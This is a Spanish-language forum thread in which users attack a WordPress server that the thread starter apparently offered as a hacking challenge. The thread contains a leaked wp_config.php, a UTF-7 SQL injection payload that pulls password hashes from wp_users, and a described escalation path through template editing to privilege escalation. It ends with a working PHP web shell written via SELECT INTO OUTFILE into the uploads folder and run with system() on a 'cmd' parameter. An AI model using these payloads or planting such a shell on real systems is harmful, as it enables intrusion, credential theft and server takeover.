Hack my server II

Iniciado por dimitrix, 28 Junio 2014, 20:09 PM

0 Miembros y 3 Visitantes están viendo este tema.

#!drvy

Cita de: MinusFour en  1 Agosto 2014, 21:42 PM
¿El wp_config.php lo puedes ver usando el infile? :O

Se..

Código (php) [Seleccionar]
<?php
// ** MySQL settings ** //
define('DB_NAME''hackme2');    // The name of th...
define('DB_USER''root');     // Your MySQL usern...
define('DB_PASSWORD'''); // ...and password
define('DB_HOST''localhost');    // 99% chance y...

// You can have multiple installations in one data...
$table_prefix  'wp_';   // Only numbers, letters...

// Change this to localize WordPress.  A correspon...
// chosen language must be installed to wp-include...
// For example, install de.mo to wp-includes/langu...
// to enable German language support.
define ('WPLANG''');

/* That's all, stop editing! Happy blogging. */

define('ABSPATH'dirname(__FILE__).'/');
require_once(
ABSPATH.'wp-settings.php');
?>


Saludos

#!drvy

@MinusFour como conseguiste ejecutar PHP ?

Saludos

WHK

aca va la inyeccion sql que estoy probando:

charset=UTF-7&title= -- a&url= -- a&excerpt= -- a&blog_name=a%2bACc-) union select user_pass from wp_users limit 1 -- -

Funciona para el select pero para el insert da error, hay que intentar provocar un error forzado como un cast a la columna para que arroje el hash del admin y desde ahi loguear y hacer el directory traversal y comenzar a elevar y ejecutar código. Recuerden que como admin pueden ejecutar código editando una plantilla a pesar de que esta no se guarde con la previsualización, aparte de la ejecución de código en varis archivos extras y desde ahi intentar ejecutar un system y desde ahi elevar privilegios escaneando archivos con permisos de root que puedan ser sobreescribibles (igual como lo hace la c99 shell).

Debo irme a mi casa, adios.

MinusFour

#103
Cita de: #!drvy en  1 Agosto 2014, 21:52 PM
@MinusFour como conseguiste ejecutar PHP ?

Saludos

No lo he podido lograr todavía, por alguna razón no escapa las comillas xD.

Pero está esto:

http://blog.sjinks.pro/wordpress/858-information-disclosure-via-sql-injection-attack/

Por cierto WHK te dejaste la IP en tus logs.

Edit: Noup, por más que lo intento las comillas las escapan y las imprimen, así que me imagino que esa vulnerabilidad no puede ejecutar código php.

dimitrix

Carpeta con permisos de escritura, lista!




WIитX

Cita de: WHK en  1 Agosto 2014, 22:01 PM
aca va la inyeccion sql que estoy probando:

charset=UTF-7&title= -- a&url= -- a&excerpt= -- a&blog_name=a%2bACc-) union select user_pass from wp_users limit 1 -- -

Funciona para el select pero para el insert da error, hay que intentar provocar un error forzado como un cast a la columna para que arroje el hash del admin y desde ahi loguear y hacer el directory traversal y comenzar a elevar y ejecutar código. Recuerden que como admin pueden ejecutar código editando una plantilla a pesar de que esta no se guarde con la previsualización, aparte de la ejecución de código en varis archivos extras y desde ahi intentar ejecutar un system y desde ahi elevar privilegios escaneando archivos con permisos de root que puedan ser sobreescribibles (igual como lo hace la c99 shell).

Debo irme a mi casa, adios.

Que asco dais D: iros de aquí eso no vale ABUSONES!!  :-(


:P
"Es más divertido hacerse pirata que unirse a la marina." (Steve Jobs)

MinusFour

Cita de: dimitrix en  2 Agosto 2014, 00:08 AM
Carpeta con permisos de escritura, lista!

¿Entonces ahora podemos escribir en /var/www?

¿No quieres poner una carpeta de uploads con permisos de escritura o cambiar la carpeta de themes y dejarla como de escritura? :)

dimitrix

Citar¿Entonces ahora podemos escribir en /var/www?

¿No quieres poner una carpeta de uploads con permisos de escritura o cambiar la carpeta de themes y dejarla como de escritura


No. Sólo la carpeta uploads de WP...




xustyx

Ya he copiado un un acceso a la shell

-> c.php?cmd=

SELECT '<?php if(isset($_REQUEST[\"cmd\"])){ $cmd = ($_REQUEST[\"cmd\"]);system($cmd);die;}?>'
INTO OUTFILE  '/var/www/wp-content/uploads/c.php'

dimitrix

Como subiste la Shell? :-)